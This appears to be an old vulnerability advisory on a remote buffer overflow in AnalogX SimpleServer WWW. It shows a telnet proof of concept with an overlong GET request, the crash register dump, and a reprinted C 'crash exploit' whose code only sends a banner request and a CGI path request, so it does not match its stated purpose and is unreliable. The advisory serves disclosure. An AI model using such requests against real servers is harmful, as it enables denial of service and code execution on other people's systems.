COMMAND

    AnalogX

SYSTEMS AFFECTED

    AnalogX WWW HTTP Server v1.1 for Win9x

PROBLEM

    Introducing AnalogX SimpleServer:  WWW, the first  in a series  of
    simple to use yet powerful servers!  This webserver is SO easy  to
    use, about the only thing you need  to know how to do is drag  and
    drop files;  then just  click on  the 'Start'  button, and  you're
    webserver is  up and  running, serving  your pages  to the  world!
    WWW  supports  MIME  file  typing,  CGI,  common  log  format, and
    multi-hosting, just  to name  a few!   If you've  always wanted  a
    compact, easy  to use,  versatile webserver,  then you're  prayers
    have been answered.

    UssrLabs  found  a  local/remote  Buffer  overflow.  The code that
    handles  GET  commandshas  an  unchecked  buffer  that  will allow
    arbitrary code to be executed if it is overflowed.  Example:

        [hell@imahacker]$ telnet die.communitech.net 80
        Trying example.com...
        Connected to die.communitech.net
        Escape character is '^]'.
        GET (buffer) HTTP/1.1 <enter><enter>

    Where [buffer] is aprox. 1000 characters.  At his point the server
    overflows.  And on remote machine someone will be seeing something
    like this.

        HTTP caused an invalid page fault in
        module <unknown> at 0000:41414141.
        Registers:
        EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
        EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
        ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
        EDX=bff76855 ES=0187 EDI=00af012c GS=0000
        Bytes at CS:EIP:

        Stack dump:
        bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
        00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
        41414141 00af02f0

    Binary or source for this Exploit (wen finished):

        http://www.ussrback.com/

    Meanwhile, here's another try for exploit by tPG Advisory.

    /*
    Code ripped from a cgi scanner.
    I actually stumbled upon the exploit through this code.
    C0D3 == M3SSY. Whatever.
    -Presto/tPG
    */
    
    #include <fcntl.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <signal.h>
    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <ctype.h>
    #include <arpa/nameser.h>
    #include <sys/stat.h>
    #include <strings.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/socket.h>
    
    void main(int argc, char *argv[])
    {
      int sock;
      struct in_addr addr;
      struct sockaddr_in sin;
      struct hostent *he;
      unsigned long start;
      unsigned long end;
      unsigned long counter;
      char foundmsg[] = "200";
      char *cgistr;
      char buffer[1024];
      int count=0;
      int numin,foreign=0;
      char ojsimp[20];
      char *okay[2];
      char *player[2];
    
      okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
      player[1] = "Check if its running now.";
    
    
    
      if (argc<2)
      {
        printf("\n HOSTNAME PLEASE@!# ");
        exit(0);
      }
      if ((he=gethostbyname(argv[1])) == NULL)
      {
        herror("gethostbyname");
        exit(0);
      }
      printf("\n\n\t Crash Exploit for AnalogX SimpleServer v1.03\n\n");
      start=inet_addr(argv[1]);
      counter=ntohl(start);
      sock=socket(AF_INET, SOCK_STREAM, 0);
      bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
      sin.sin_family=AF_INET;
      sin.sin_port=htons(80);
    
      if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
      {
        perror("connect");
      }
      printf("\n\n HTTPD Version. \n");
      getchar();
      send(sock, "HEAD / HTTP/1.0\n\n",17,0);
      recv(sock, buffer, sizeof(buffer),0);
      printf("%s",buffer);
      close(sock);
      printf("\n\t Press something. \n");
      getchar();
      while(count++ < 2)
      {
        sock=socket(AF_INET, SOCK_STREAM, 0);
        bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
        sin.sin_family=AF_INET;
        sin.sin_port=htons(80);
        if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
        {
          perror("connect");
        }
    
        printf(" %s : ",player[count]);
        for(numin=0;numin < 20;numin++)
        {
          ojsimp[numin] = '\0';
        }
        send(sock, okay[count],strlen(okay[count]),0);
        recv(sock, ojsimp, sizeof(ojsimp),0);
        cgistr = strstr(ojsimp,foundmsg);
    
        if( cgistr != NULL)
        {
          printf("Heh.\n");++foreign;
        }
        else printf(" tPG\n");
    
        close(sock);
      }
      if (foreign)
      {
        printf("bl3h. bl4h. h3h. w00p. 33p.\n");
      }
    }

SOLUTION
    
    Nothing yet, but vendor has been informed.